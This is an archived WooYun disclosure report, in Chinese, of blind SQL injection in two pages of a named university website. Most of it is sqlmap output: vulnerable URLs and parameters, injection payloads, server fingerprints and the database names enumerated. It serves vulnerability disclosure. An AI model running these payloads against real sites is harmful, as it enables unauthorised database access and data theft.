乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 细节已通知厂商并且等待厂商处理中 2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开
点到就走
http://tw.heuet.edu.cn/TP_News_ye.aspx?ID=22208
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 79 HTTP(s) requests:---Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=22208 AND 1419=1419---
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008
available databases [6]:[*] 2012_win[*] gongqingtuan[*] master[*] model[*] msdb[*] tempdb
这个就到这吧,具体的我不往下做了这个站到处是洞我只是来求邀请码的,点到为止,刚刚查了下,这个参数没重复,为了以防万一,再加一个吧,只求邀请码
http://kyc.heuet.edu.cn/Report/ResultM.aspx?typeID=5
sqlmap identified the following injection points with a total of 146 HTTP(s) requests:---Place: GETParameter: typeID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: typeID=5' AND 2105=2105 AND 'YEAo'='YEAo---
available databases [5]:[*] KYC2[*] master[*] model[*] msdb[*] tempdb
你们更专业
危害等级:无影响厂商忽略
忽略时间:2015-07-26 18:26
暂无